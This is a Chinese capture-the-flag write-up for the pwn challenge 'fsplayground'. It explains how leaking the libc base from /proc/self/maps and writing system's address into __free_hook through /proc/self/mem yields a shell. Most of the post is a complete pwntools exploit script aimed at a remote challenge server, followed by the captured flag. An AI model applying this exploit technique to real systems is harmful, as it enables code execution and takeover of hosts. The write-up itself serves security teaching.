[Pwn] fsplayground xp0int Posted on Sep 6 2020 可以open、close、seek、read 和 write flag 以外的任意文件,read 和 write 功能调用了malloc和free。首先打开`/proc/self/maps`泄漏 libc 基地址。然后打开`/proc/self/mem`,利用 seek 和 write 向 free hook 写入 system 地址,最后 write + "/bin/sh\x00" 字符串 getshell。 ``` #!/usr/bin/env python3 from pwn import * context(arch="amd64", log_level="debug") p = remote("119.3.111.133", 6666) libc = ELF("./libc-2.27.so") p_sl = lambda x, y : p.sendlineafter(y, x) def Open(fn, opt): p_sl('1', "Your choice: ") p_sl(fn+'\x00', "Filename: ") p_sl(str(opt), "Option: ") def Seek(s): p_sl('3', "Your choice: ") p_sl(str(s), "Offset: ") def Close(): p_sl('2', "Your choice: ") def Read(sz): p_sl('4', "Your choice: ") p_sl(str(sz), "Size: ") def Write(sz, ctx): p_sl('5', "Your choice: ") p_sl(str(sz), "Size: ") p_sl(ctx, "Content: ") Open("/proc/self/maps", 0) Read(0x500) p.recvuntil("[heap]\n") libc.address = int(p.recvuntil("-", True), 16) Close() Open("/proc/self/mem", 1) Seek(libc.symbols["__free_hook"]) Write(8, p64(libc.symbols["system"])) Write(8, "/bin/sh\x00") p.interactive() ``` flag:`flag{910efb50faa7407b916c206217951dd0}` 打赏还是打残,这是个问题 赏 Wechat Pay Alipay [Pwn] babyrpc - cpt.shao [Crypto] confused_flag - match
没有帐号? 立即注册